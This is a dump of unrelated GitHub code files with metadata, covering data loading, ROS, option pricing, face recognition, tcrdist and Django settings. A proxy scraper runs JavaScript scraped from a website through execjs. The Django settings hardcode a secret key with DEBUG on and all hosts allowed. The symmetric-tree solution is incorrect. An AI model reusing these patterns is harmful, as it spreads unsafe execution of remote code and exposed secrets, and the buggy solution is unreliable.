user_name=\"hdfs\")\n# TypeError: cannot use a string pattern on a bytes-like object\n# 从hdfs中读取文件\nfile = client.open(r\"/a_jkong_test_data/1000.txt\")\n# 获取内容\ncontent = file.read()\n# open后,file是二进制,str()转换为字符串并转码\ns = str(content, \"utf-8\")\n# 打开本地文件.csv 并写入内容\nfile = open(\"./data/data.csv\", \"w\")\nfile.write(s)\n# pandas读取本地csv文件\ntrain_data = pd.read_csv(\"./data/data.csv\", sep=\",\", header=None, usecols=[0, 1, 2, 3, 4],\n names=['id', 'name', 'age', 'gender', 'time'])\nprint(train_data)\n","repo_name":"chaihuo-go/deutero-learning-samples","sub_path":"python/python_learning/pandas/datasource/2_hdfs_source.py","file_name":"2_hdfs_source.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"423391765","text":"import sys\ninput = sys.stdin.readline\n\n\nN = int(input()) \narr = [list(input().strip()) for _ in range(N)]\n\nalphabet = []\nfor word in arr:\n for a in word:\n if a not in alphabet:\n alphabet.append(a)\n\nvalue_list = []\nfor a in alphabet:\n value = 0\n for word in arr:\n if a not in word: # 알파벳 없으면 넘어감\n continue\n\n s = \"\"\n for w in word:\n s += \"1\" if w == a else \"0\"\n value += int(s)\n\n value_list.append(value)\n\nvalue_list.sort(reverse=True) \n\nanswer = 0\nvalue = 9\nfor s in value_list:\n answer += value * s\n value -= 1\n\nprint(answer)","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"009주차/단어 수학/beom.py","file_name":"beom.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"42334100271","text":"import ckan.plugins.toolkit as tk\n\n\nconfig = tk.config\n\n\ndef is_s3filestore_enabled():\n enabled = config.get('hdx.s3filestore')\n if enabled is None:\n enabled = 's3filestore' in config.get('ckan.plugins', '')\n config['hdx.s3filestore'] = enabled\n return enabled\n","repo_name":"OCHA-DAP/hdx-ckan","sub_path":"ckanext-hdx_theme/ckanext/hdx_theme/helpers/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"} +{"seq_id":"8879492846","text":"import re\nimport execjs\nfrom spoon_server.proxy.provider import Provider\nfrom spoon_server.util.html_parser import get_html_tree\n\n\nclass PdbProvider(Provider):\n def __init__(self, url_list=None):\n super(Provider, self).__init__()\n if not url_list:\n self.url_list = self._gen_url_list()\n\n @staticmethod\n def _gen_url_list():\n url_list = ['http://proxydb.net/?protocol=http&protocol=https',\n ]\n return url_list\n\n @Provider.provider_exception\n def getter(self):\n for url in self.url_list:\n tree = get_html_tree(url)\n if tree is None:\n continue\n proxy_list = tree.xpath('/html/body/div[2]/table//tr')\n for px in proxy_list[1:]:\n script_string = 'function func() {var proxies=[];' + (\n re.sub(\"document.*?;\", \"\",\n ''.join(px.xpath('./td[1]/script/text()'))) + \"; return proxies}\").replace(\n \"\\n\", \"\")\n js_string = execjs.compile(script_string)\n result = js_string.call('func')\n yield result[0]\n\n\nif __name__ == \"__main__\":\n kd = PdbProvider()\n for proxy in kd.getter():\n print(proxy)\n","repo_name":"Jiramew/spoon","sub_path":"spoon_server/proxy/pdb_provider.py","file_name":"pdb_provider.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"72"} +{"seq_id":"34631182956","text":"a, b, c = map(int, input().split())\r\n\r\ns = set()\r\nfind_flag = 0\r\n\r\nfor i in range(1, 100):\r\n rest = a * i % b\r\n if rest == c:\r\n find_flag = 1\r\n break\r\n if rest in s:\r\n break\r\n else:\r\n s.add(rest)\r\n\r\nif find_flag:\r\n print(\"YES\")\r\nelse:\r\n print(\"NO\")","repo_name":"YamasouA/Atcoder","sub_path":"ABC60-B.py","file_name":"ABC60-B.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"471575047","text":"from Solver.Option_Solver import Option_Solver\n\nif __name__==\"__main__\":\n ### Option-Inputparamter:\n r, q, sigma, K, T, option_type = 0.1, 0.05, 0.25, 100, 2, 'Put'\n\n ### Further parameters:\n l=99 # number of basis points for the Gauss quadrature\n m=25 # number of basis points for the Chebyshev polynomial\n n=15 # number of fixpoint iteration steps\n stop_by_diff=1e-6 # set stop_by_diff=None for fixed n\n\n\n ### Creating instance:\n option = Option_Solver(r, q, sigma, K, T, option_type)\n\n ### calculate Early Exercise Boundary:\n option.create_boundary()\n\n ### calculate prices:\n S, tau = 100, 1 # tau has to be in [0, T]\n American_price = option.American_price(S, tau) \n American_premium = option.premium(S, tau)\n European_price = option.European_price(S, tau)\n\n ### Output:\n print('American_price:', American_price)\n print('American_premium:', American_premium)\n print('European_price:', European_price)\n \n\n\n\n\n","repo_name":"MariusLotz/Masterarbeit2023","sub_path":"Option_pricer.py","file_name":"Option_pricer.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18707690205","text":"# this is multi tags abc class method,selcet m form N,m<N,m>1,N>2\n#from my_model.task.task_class.abc_class import ABCClass \n\n#from my_model.layers.base_process import InputFeatures\nfrom my_model.task.abc_task import ABCTask\nimport json\ndef get_mul_tags(tags_path,max_seq_length=512,embeddings_type='other',args=None):\n data_dir=None\n vocab_path=None\n tokenizer=None\n fe = ABCMulTags(data_dir,'./',tags_path,vocab_path,embeddings_type=embeddings_type,tokenizer=tokenizer,max_seq_length=max_seq_length,args=args)\n return fe.get_label_ids\nclass ABCMulTags(ABCTask):\n @staticmethod\n def parse_word_label(line): \n res_json = json.loads(line)\n word = res_json['statement_split']\n word = word.strip(':')\n label = res_json['law_item']\n return word,label\n def _read_data(self,input_file):\n \"\"\"Read a BIO data!\"\"\"\n rf = open(input_file,'r')\n lines = []\n #words = []\n #labels = []\n for line in rf:\n #word = line.strip().split(' ')[0]\n #label = line.strip().split(' ')[-1]\n\n word,label = self.parse_word_label(line)\n # here we dont do \"DOCSTART\" check\n #checkfor la in label:\n #check if la:\n #check if word:\n #check #words.append(word)\n #check #labels.append(la)\n if not label:\n raise ValueError('label is empty,and word is {}'.format(word))\n yield (label,word)\n # lines.append((label,word))\n #rf.close()\n #return lines\n def get_label_ids(self,label):\n label_ids = [0] * len(self.label_list)\n for la in label:\n idx = self.label_map.get(la,0)\n if idx != 0:\n label_ids[idx] = 1\n \n return label_ids\n #def _convert_single_example(self,ex_index, example, mode):\n\n # input_ids,mask,segment_ids,ntokens = self._convert_single_feature(ex_index,example,mode)\n # label_ids = self._convert_single_feature(ex_index,example,mode)\n # feature = InputFeatures(\n # input_ids=input_ids,\n # mask=mask,\n # segment_ids=segment_ids,\n # label_ids=label_ids,\n # )\n # # we need ntokens because if we do predict it can help us return to original token.\n # return feature,label_ids,ntokens\n","repo_name":"ycpan/my_model","sub_path":"src/my_model/task/task_class/abc_mul_tags.py","file_name":"abc_mul_tags.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7543628181","text":"import time\nimport sys\nimport numpy as np\nimport rospy\nfrom math import sqrt, cos, sin\nfrom geometry_msgs.msg import Twist\n\n\nclass kuka():\n #\"A class for connecting to and sending commands to a kuka\"\n\n def __init__(self):\n rospy.init_node('Kuka_emergency_stop', anonymous=True)\n self.cmd_pub = rospy.Publisher('/cmd_vel',Twist,queue_size=10)\n\n def stop(self):\n\n newcmd = Twist()\n newcmd.linear.x = 0\n newcmd.linear.y = 0\n newcmd.linear.z = 0\n\n newcmd.angular.x = 0\n newcmd.angular.y = 0\n newcmd.angular.z = 0\n\n self.cmd_pub.publish(newcmd)\n\nif __name__ == '__main__':\n kuka1 = kuka()\n while not rospy.is_shutdown():\n kuka1.stop()\n # rospy.spin()\n","repo_name":"akchoi/KUKA-skills","sub_path":"estop.py","file_name":"estop.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37307194959","text":"import torch\nfrom torch.utils.data import DataLoader\nimport sys\nimport torch.nn as nn\nsys.path.append(\"..\")\n\n# from model.tvts_bert import TVTSBERT\n# from finetune_predict import TVTSBERTFTPredictor\nfrom LSTM_prediction_model import LSTM\nfrom LSTM_predict import LSTMPredictor\nfrom finetune.finetune_predict_dataset import FinetunePredictDataset\nimport numpy as np\nimport pandas as pd\nimport random\nfrom matplotlib import pyplot as plt\n\n\ndef test2_plot(prediction_result_list, input289_list, prediction_len, seq_len=288):\n p = []\n q = []\n inputs = []\n for item in prediction_result_list:\n\n p.append(item.cpu().numpy())\n for item in input289_list:\n q.append(item.cpu().numpy())\n\n\n # 预测值\n prediction_result = np.array(p[:-1]).flatten() # 去掉最后一个可能长度不一致的样本 len:4608\n print(prediction_result.shape)\n\n input289 = np.array(q[:-1]).flatten()\n\n for i in range(len(input289)):\n if i % (seq_len+prediction_len) == 0:\n inputs.append(input289[i:i+prediction_len])\n # 输入真实值\n inputs_array = np.array(inputs).flatten() # len:4608\n print(inputs_array.shape)\n\n\n plt.figure()\n # 输入曲线3*288蓝色\n # plt.plot(inputs_array[seq_len:seq_len*2], c='b', label='Input1')\n # plt.plot(np.arange(seq_len,seq_len*2), inputs_array[seq_len*2:seq_len*3], c='b', label='Origin2', linestyle='--')\n # plt.plot(np.arange(seq_len*2,seq_len*3), inputs_array[seq_len*3:seq_len*4], c='b', label='Origin3')\n plt.plot(inputs_array[seq_len:seq_len*8], c='r', label='Input')\n\n # 预测曲线3*288红色\n # plt.plot(prediction_result[:seq_len], c='r', label='Predict1')\n # plt.plot(np.arange(seq_len, seq_len*2), prediction_result[seq_len:seq_len*2], c='r', label='Predict2', linestyle='--')\n # plt.plot(np.arange(seq_len*2,seq_len*3), prediction_result[seq_len*2:seq_len*3], c='r', label='Predict3')\n plt.plot(prediction_result[:seq_len*7], c='g', label='Predict')\n\n plt.vlines(287.5, 0, 70, colors='black', linestyles='--')\n plt.vlines(575.5, 0, 70, colors='black', linestyles='--')\n plt.vlines(863.5, 0, 70, colors='black', linestyles='--')\n plt.vlines(1151.5, 0, 70, colors='black', linestyles='--')\n plt.vlines(1439.5, 0, 70, colors='black', linestyles='--')\n plt.vlines(1727.5, 0, 70, colors='black', linestyles='--')\n plt.hlines(0, 0, 2015, colors='black', linestyles='--')\n plt.title('A Week Prediction Result')\n plt.legend(['Input', 'Predict'])\n # plt.savefig('420finetune_predict_1.png')\n plt.savefig('2_12.png')\n\n df = pd.DataFrame({'Input': inputs_array[seq_len:seq_len * 8],\n 'Predict': prediction_result[:seq_len * 7],\n })\n df.to_csv('2_12.csv')\n\n\ndef save_results(prediction_result_list, input289_list, word_len, prediction_len, dropout, seq_len=288):\n # print(f'prediction result list shape: [{len(prediction_result_list)}, {len(prediction_result_list[0])}, {len(prediction_result_list[0][0])}]')\n # print(f'input list shape: [{len(input289_list)}, {len(input289_list[0])}, {len(input289_list[0][0])}]')\n # [20, batchsize, prediction len]\n # [20, batchsize, 288 + prediction len]\n p = []\n q = []\n inputs = []\n for item in prediction_result_list:\n p.append(item.cpu().numpy())\n for item in input289_list:\n q.append(item.cpu().numpy())\n\n p_array = np.array(p[:-1]) # [num of sample in dataloader-1, batchsize, prediction_len]\n q_array = np.array(q[:-1]) # [num of sample in dataloader-1, batchsize, 288 + prediction_len]\n # 预测值\n prediction_result = p_array.flatten()\n input289 = q_array[:,:,-prediction_len:].flatten()\n print(prediction_result.shape)\n print(input289.shape)\n\n df_all = pd.DataFrame({'Input': input289,\n 'Predict': prediction_result,\n })\n print(df_all.head(10))\n # df.to_csv('420predict_result_1.csv')\n # print(f'Saving predict test result into /{word_len}_{prediction_len}_{dropout}_new.xlsx ...')\n print(f'Saving predict test result into test_result_all/prediction_result_new/excel/lstm_{prediction_len}_{dropout}_step36.csv ...')\n df_all.to_csv(f'../finetune/test_result_all/prediction_result_new/lstm_{prediction_len}_{dropout}_step36.csv')\n df_all.to_excel(f'../finetune/test_result_all/prediction_result_new/excel/lstm_{prediction_len}_{dropout}_step36.xlsx', index=False)\n # df_all.to_excel(f'test_result_all/prediction_result_new/excel/{word_len}_{prediction_len}_{dropout}_new.xlsx', index=False)\n\n\ndef setup_seed(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\nsetup_seed(20)\n\nfile_path = '../data/'\nseq_len = 288\npe_window = 288\nnum_features = 1\nepochs = 30\nbatch_size = 64\nhidden_size = 64\nlayers = 3\nattn_heads = 8\nlearning_rate = 2e-5\n\nword_len = 1\n# prediction_len = 12\ndropout = 0.1\n\nfor prediction_len in [1]:\n print(f'prediction length: {prediction_len}')\n # pretrain_path = f'../checkpoints/pretrain/word-{word_len}-{dropout}/'\n # finetune_path = f'../checkpoints/finetune/prediction/word-{word_len}-p-{prediction_len}-dropout{dropout}-new/'\n finetune_path = f'../checkpoints/finetune/prediction/lstm-p{prediction_len}-dropout{dropout}-step36/'\n\n train_file = file_path + 'train%dsmoothed.csv' % (seq_len+prediction_len)\n valid_file = file_path + 'valid%dsmoothed.csv' % (seq_len+prediction_len)\n test_file = file_path + 'test%dsmoothed.csv' % (seq_len+prediction_len)\n # train_file = file_path + f'train_step36_pre{prediction_len}_smoothed.csv'\n # valid_file = file_path + f'valid_step36_pre{prediction_len}_smoothed.csv'\n # test_file = file_path + f'test_step36_pre{prediction_len}_smoothed.csv'\n\n train_dataset = FinetunePredictDataset(file_path=train_file,\n num_features=num_features,\n seq_len=seq_len,\n prediction_len=prediction_len,\n word_len=word_len)\n valid_dataset = FinetunePredictDataset(file_path=valid_file,\n num_features=num_features,\n seq_len=seq_len,\n prediction_len=prediction_len,\n word_len=word_len)\n test_dataset = FinetunePredictDataset(file_path=test_file,\n num_features=num_features,\n seq_len=seq_len,\n prediction_len=prediction_len,\n word_len=word_len)\n\n train_dataloader = DataLoader(train_dataset, shuffle=True, num_workers=8, pin_memory=True,\n batch_size=batch_size, drop_last=False)\n valid_dataloader = DataLoader(valid_dataset, shuffle=False, num_workers=8, pin_memory=True,\n batch_size=batch_size, drop_last=False)\n test_dataloader = DataLoader(test_dataset, shuffle=False, num_workers=8, pin_memory=True,\n batch_size=batch_size, drop_last=False)\n\n # tvtsbert = TVTSBERT(word_len=word_len,\n # hidden=hidden_size,\n # n_layers=layers,\n # pe_window=pe_window,\n # attn_heads=attn_heads,\n # dropout=dropout)\n lstm = LSTM(input_size=num_features,\n hidden_size=hidden_size,\n num_layers=layers,\n prediction_len=prediction_len,\n )\n\n # tvtsbert_path = pretrain_path + \"checkpoint.bert.pth\"\n # tvtsbert.load_state_dict(torch.load(tvtsbert_path, map_location=torch.device('cpu')))\n\n # tvtsbert.load_state_dict(torch.load(tvtsbert_path))\n\n\n # finetuner = TVTSBERTFTPredictor(tvtsbert, num_features=num_features,\n # seq_len=seq_len, prediction_len=prediction_len,\n # word_len=word_len, train_dataloader=train_dataloader,\n # valid_dataloader=valid_dataloader)\n finetuner = LSTMPredictor(lstm, seq_len=seq_len, prediction_len=prediction_len,\n hidden=hidden_size, num_features=num_features, layers=layers, lr=learning_rate,\n train_dataloader=train_dataloader, valid_dataloader=valid_dataloader)\n\n # Test: 重新加载finetune的模型\n print(\"\\n\" * 5)\n print(\"Testing TVTS-BERT Finetune Predictor...\")\n\n\n finetuner.load(finetune_path)\n\n # test需要输入参数i:第几个epoch(< 31)\n # 参数j:第几个样本(< 32)\n\n # prediction_result_list, prediction_target_list = finetuner.test(test_dataloader)\n prediction_result_list, input289_list = finetuner.test(test_dataloader)\n\n\n # test2_plot(prediction_result_list, input289_list, prediction_len=prediction_len)\n save_results(prediction_result_list, input289_list,\n word_len=word_len, prediction_len=prediction_len, dropout=dropout)\n print('----------\\n')\n\n","repo_name":"Xiao-Di/TSSN","sub_path":"LSTM/predict_test.py","file_name":"predict_test.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71433155753","text":"import pytest\nimport pandas as pd\nv20df = pd.read_csv('https://www.dropbox.com/s/wmc5wc752t782kq/MIRA_v21_covid_diagnosed_sars_cov2_ci_epitope_specific_tcrs.tsv?dl=1', sep = \"\\t\").head(1000)\nv21df = pd.read_csv('https://www.dropbox.com/s/c3gfq1lu0xdefpy/MIRA_v20_covid_diagnosed_sars_cov2_ci_epitope_specific_tcrs.tsv?dl=1', sep = \"\\t\").head(1000)\n\n\"\"\"\nExample 1, Edit Dist 1 join\n\"\"\"\ndef test_tcr_join_edit1():\n import pandas as pd\n from tcrdist.join import join_by_dist\n from tcrdist.breadth import get_safe_chunk\n from tcrdist.rep_funcs import compute_pws_sparse\n import pwseqdist as pw\n\n my_metrics = { \"cdr3_b_aa\" : pw.metrics.nb_vector_editdistance}\n my_weights = { \"cdr3_b_aa\" : 1}\n my_kargs = {\"cdr3_b_aa\" :{'use_numba': True}}\n distances = compute_pws_sparse(\n df= v21df,\n df2 = v20df ,\n metrics = my_metrics,\n weights = my_weights,\n kargs = my_kargs,\n radius=1,\n cpu=2, \n chunk_size=get_safe_chunk(v21df.shape[0], v20df.shape[0]), \n store=False, \n pm_pbar=True)\n csrmat = distances['tcrdist'] # it's called a tcrdist here, but was computed as edit distance 1\n left_join_df = join_by_dist(\n how = 'left',\n csrmat = csrmat,\n left_df = v21df,\n right_df = v20df,\n left_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n right_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n left_suffix = '_x',\n right_suffix = '_y',\n max_n= 10,\n radius = 1)\n inner_join_df = join_by_dist(\n how = 'inner',\n csrmat = csrmat,\n left_df = v21df,\n right_df = v20df,\n left_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n right_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n left_suffix = '_x',\n right_suffix = '_y',\n max_n= 10,\n radius = 1)\n outer_join_df = join_by_dist(\n how = 'outer',\n csrmat = csrmat,\n left_df = v21df,\n right_df = v20df,\n left_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n right_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n left_suffix = '_x',\n right_suffix = '_y',\n max_n= 10,\n radius = 1)\n \n assert left_join_df.shape[0] > inner_join_df.shape[0]\n assert outer_join_df.shape[0] > inner_join_df.shape[0]\n assert outer_join_df.shape[0] > left_join_df.shape[0]\n \n\"\"\"\n2. Full Example using TCRdist on all CDRs on real data from two MIRA cohorts, \nHere we use TCRrep to infer CDR1,2,2.5 to compute a full tcrdist \n\"\"\"\ndef test_tcr_join_tcrdist():\n import pandas as pd\n from tcrdist.breadth import get_safe_chunk\n from tcrdist.repertoire import TCRrep\n from tcrdist.join import join_by_dist\n\n tr20 = TCRrep(cell_df = v20df[['subject', 'cdr3_b_aa', 'v_b_gene', 'j_b_gene', 'bio_identity','protein_coordinate']].copy(),\n organism='human', \n chains=['beta'], \n compute_distances = False)\n tr21 = TCRrep(cell_df = v21df[['subject', 'cdr3_b_aa', 'v_b_gene', 'j_b_gene', 'bio_identity', 'protein_coordinate']].copy(),\n organism='human', \n chains=['beta'], \n compute_distances = False)\n tr21.cpus = 2\n tr21.compute_sparse_rect_distances(df = tr21.clone_df, df2 = tr20.clone_df, radius = 36, chunk_size = get_safe_chunk(tr21.clone_df.shape[0], tr20.clone_df.shape[0]))\n\n left_right_comparision = join_by_dist(\n how = 'inner',\n csrmat = tr21.rw_beta,\n left_df = v21df,\n right_df = v20df,\n left_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n right_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n left_suffix = '_x',\n right_suffix = '_y',\n max_n= 10,\n radius = 24)\n\n","repo_name":"kmayerb/tcrdist3","sub_path":"tcrdist/tests/test_join.py","file_name":"test_join.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"15531566861","text":"import geometry_msgs.msg\nimport visualization_msgs.msg\nimport rospy\nimport tf\n\nimport tf2_ros\nimport tf2_msgs.msg\nimport geometry_msgs.msg\n\n\nclass SceneObject:\n\n # name = ''\n # parent_object = None\n # parent_object_name = None\n # transform_from_parent_object = geometry_msgs.msg.TransformStamped()\n # object_id = None\n #\n # has_visual = False\n # mesh_resource = 'package://nextage_movement_skills/python/meshes/tmp/whole_sweep.dae'\n\n def __init__(self):\n self.parent_object = None\n self.parent_object_name = None\n self.transform_from_parent_object = geometry_msgs.msg.TransformStamped()\n self.object_id = None\n self.marker_type = visualization_msgs.msg.Marker.MESH_RESOURCE\n self.mesh_resource = None\n self.name = None\n self.has_visual = False\n self.has_collision = False\n self.updated = True\n self.children = {}\n self.delete_marker = False\n self.type = 'abstract_object'\n self.color = {'r': 1.0, 'g': 0.0, 'b': 0.0}\n self.size = [1.0, 1.0, 1.0]\n\n def set_name(self, name):\n self.name = name\n\n def add_child(self, child):\n self.children[child.name] = child\n\n def remove_child_by_name(self, child_name):\n if child_name in self.children.keys():\n del self.children[child_name]\n return\n rospy.logwarn(\"Object child not deleted from \" + self.name + \": not in dict\")\n\n def set_object_id(self, idx):\n self.object_id = idx\n\n def set_transform_from_parent_object(self, transform):\n self.transform_from_parent_object = transform\n\n def set_parent_object(self, parent_object):\n self.parent_object = parent_object\n\n def set_parent_object_name(self, parent_object_name):\n self.parent_object_name = parent_object_name\n\n def set_mesh_resource(self, mesh_resource):\n self.mesh_resource = mesh_resource\n self.has_visual = True\n self.marker_type = visualization_msgs.msg.Marker.MESH_RESOURCE\n\n def set_visualization(self, viz_type=visualization_msgs.msg.Marker.SPHERE):\n self.marker_type = viz_type\n self.has_visual = True\n\n def set_size(self, size=[0.1, 0.1, 0.1]):\n self.size = size\n\n def set_has_collision(self, has_collision=True):\n self.has_collision = has_collision\n return self.has_collision\n\n def get_has_collision(self):\n return self.has_collision\n\n def get_visualization_marker(self, action=visualization_msgs.msg.Marker.ADD):\n # type: (int) -> visualization_msgs.Marker\n if not self.has_visual:\n rospy.logwarn(\"Object \" + self.name + \" shall not be visualized. Configure and retry!\")\n return\n marker = visualization_msgs.msg.Marker()\n\n # marker.header.frame_id = self.parent_object_name\n marker.header.frame_id = self.name\n marker.header.stamp = rospy.Time.now()\n marker.ns = \"scene_objects\"\n marker.id = self.object_id\n marker.type = self.marker_type\n marker.action = action\n\n if self.delete_marker:\n marker.action = visualization_msgs.msg.Marker.DELETE\n\n marker.pose.position.x = 0\n marker.pose.position.y = 0\n marker.pose.position.z = 0\n marker.pose.orientation.x = 0\n marker.pose.orientation.y = 0\n marker.pose.orientation.z = 0\n marker.pose.orientation.w = 1\n\n marker.scale.x = self.size[0]\n marker.scale.y = self.size[1]\n marker.scale.z = self.size[2]\n marker.color.a = 0.9\n marker.color.r = self.color['r']\n marker.color.g = self.color['g']\n marker.color.b = self.color['b']\n\n if self.marker_type == visualization_msgs.msg.Marker.MESH_RESOURCE:\n marker.mesh_resource = self.mesh_resource\n assert marker.mesh_resource is not None\n\n return marker\n\n def set_color(self, r=1.0, g=1.0, b=1.0):\n self.color['r'] = r\n self.color['g'] = g\n self.color['b'] = b\n\n def reparent(self, new_parent_transform, new_parent):\n del self.parent_object.children[self.name]\n old_parent = self.parent_object\n self.parent_object = new_parent\n self.parent_object.add_child(self)\n self.parent_object_name = new_parent.name\n self.transform_from_parent_object = new_parent_transform\n\n rospy.loginfo(\"Object \" + self.name + \" reparented from \" + old_parent.name + \" to \" + self.parent_object.name)\n\n # def get_grasp_poses(self, end_effector):\n\n\n\n","repo_name":"boschresearch/STAAMS-Solver","sub_path":"roadmap_tools/src/roadmap_tools/scene_object.py","file_name":"scene_object.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"26215211391","text":"# https://leetcode.com/problems/all-nodes-distance-k-in-binary-tree/\n# think \n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def distanceK(self, root: TreeNode, target: TreeNode, K: int) -> List[int]:\n mp = {}\n\n def traverse(root, path):\n nonlocal mp\n\n if root is None:\n return\n mp[root] = path\n if not root.left is None:\n traverse(root.left, path + '0')\n if not root.right is None:\n traverse(root.right, path + '1')\n\n def diff(p1, p2):\n n1 = len(p1)\n n2 = len(p2)\n i = 0\n while i < n1 and i < n2:\n if p1[i] != p2[i]:\n break\n i += 1\n return n1 - i + n2 - i\n\n traverse(root, '')\n\n pt = mp[target]\n res = []\n for ptr in mp:\n if diff(pt, mp[ptr]) == K:\n res.append(ptr.val)\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/0501-1000/0863_all-nodes-distance-k-in-binary-tree_1_AC.py","file_name":"0863_all-nodes-distance-k-in-binary-tree_1_AC.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"16285320998","text":"import io\nimport os\nimport time\n\nimport boto3\nimport cv2\nfrom dotenv import load_dotenv\nfrom PIL import Image\n\nload_dotenv()\n\nrekognition = boto3.client(\n \"rekognition\",\n aws_access_key_id=os.getenv(\"AWS_ACCESS_KEY_ID\"),\n aws_secret_access_key=os.getenv(\"AWS_SECRET_ACCESS_KEY\"),\n region_name=os.getenv(\"REGION_NAME\"),\n)\n\nlistCollectionsResponse = rekognition.list_collections()\n\nprint(f\"CollentionId={listCollectionsResponse['CollectionIds']}\")\nprint(f\"FaceModelVersions={listCollectionsResponse['FaceModelVersions']}\")\n\ncollectionId = \"person-detection\"\n\nif collectionId in listCollectionsResponse[\"CollectionIds\"]:\n response = rekognition.delete_collection(CollectionId=collectionId)\n\nresponse = rekognition.create_collection(CollectionId=collectionId)\n\n\ndef get_face(cap):\n _, frame = cap.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(frame)\n png = io.BytesIO()\n image.save(png, format=\"png\")\n return png\n\n\nprint(\"\")\nprint(f\"Regist your face.\")\nprint(f\"Indexing your face ...\")\n\ncap = cv2.VideoCapture(0)\ntime.sleep(3)\n\nresponse = rekognition.index_faces(\n CollectionId=collectionId,\n Image={\"Bytes\": get_face(cap).getvalue()},\n DetectionAttributes=[\"DEFAULT\"], #'DEFAULT'|'ALL',\n ExternalImageId=\"test\",\n MaxFaces=1,\n QualityFilter=\"AUTO\", # NONE | AUTO | LOW | MEDIUM | HIGH\n)\n\nprint(response)\nprint(f\"Indexed {response['FaceRecords'][0]['Face']['FaceId']} .\")\n\nprint(\"\")\nprint(\"Test.\")\n\nresponse = rekognition.search_faces_by_image(\n CollectionId=collectionId,\n Image={\"Bytes\": get_face(cap).getvalue()},\n MaxFaces=1,\n FaceMatchThreshold=95,\n)\n\nprint(f\"SearchFacesByImageResponse={response}\")\n","repo_name":"fujitake/smart-building-quick-start-kit","sub_path":"devices/cameras/registrant-detection/face_register.py","file_name":"face_register.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30256516751","text":"# https://leetcode.com/problems/symmetric-tree/\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\ndef isSymmetric(root):\n if root is None:\n return True\n child01 = isSymmetric(root.left)\n child02 = isSymmetric(root.right)\n\n if child01 == child02:\n return True\n\n return False\n\n\nif __name__ == '__main__':\n tree = TreeNode(1)\n tree.left = TreeNode(2)\n tree.right = TreeNode(2)\n tree.left.left = None\n tree.right.left = None\n tree.left.right = 3\n tree.right.right = 3\n\n print(isSymmetric(tree))\n","repo_name":"zubayr-ahmad/solutions","sub_path":"Symmetric_Tree.py","file_name":"Symmetric_Tree.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25283220451","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for tests project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(__file__)\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'rebtxok1^7rs-8t7b8idshbe5wc#=nv)%nm-n+1b0c!mdxlrb_'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = DEBUG\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'doj',\n 